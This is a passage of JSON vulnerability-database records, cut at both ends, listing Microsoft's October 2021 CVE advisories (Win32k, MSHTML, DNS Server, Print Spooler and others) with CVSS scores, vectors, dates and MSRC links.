false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40443", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40443", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:45:48", "description": "Windows Fast FAT File System Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-38662. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Fast FAT File System Driver Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38662", "CVE-2021-41343"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41343", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41343", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-17T17:46:06", "description": "Windows Fast FAT File System Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-41343. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Fast FAT File System Driver Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38662", "CVE-2021-41343"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-38662", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38662", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-12-06T18:18:10", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41342"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41342", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41342", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:14", "description": "Windows Media Audio Decoder Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Media Audio Decoder Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41331"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41331", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41331", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:24", "description": "Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40460"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40460", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40460", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:18:24", "description": "Windows exFAT File System Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows exFAT File System Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38663"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-38663", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38663", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:18:10", "description": "Windows Graphics Component Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Graphics Component Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41340"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41340", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41340", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:22", "description": "Windows Text Shaping Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Text Shaping Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40465"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40465", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:14", "description": "Windows HTTP.sys Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows HTTP.sys Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26442"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-26442", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26442", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:12", "description": "Windows Kernel Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41335"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41335", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41335", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:18:13", "description": "Windows Print Spooler Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41332"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41332", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41332", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:18:33", "description": "Windows TCP/IP Denial of Service Vulnerability \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows TCP/IP Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36953"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-36953", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36953", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "Windows DNS Server Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40469"], "modified": "2022-02-02T08:00:00", "id": "MS:CVE-2021-40469", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40469", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:18:32", "description": "Windows Installer Spoofing Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Installer Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40455", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40455", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:18:33", "description": "Windows Print Spooler Spoofing Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36970"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-36970", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36970", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-17T17:45:46", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-40450. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41357", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41357", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:46:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-41357. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40450", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40450", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:46:16", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40450, CVE-2021-41357. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40449", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40449", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:45:52", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Storage Spaces Controller Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 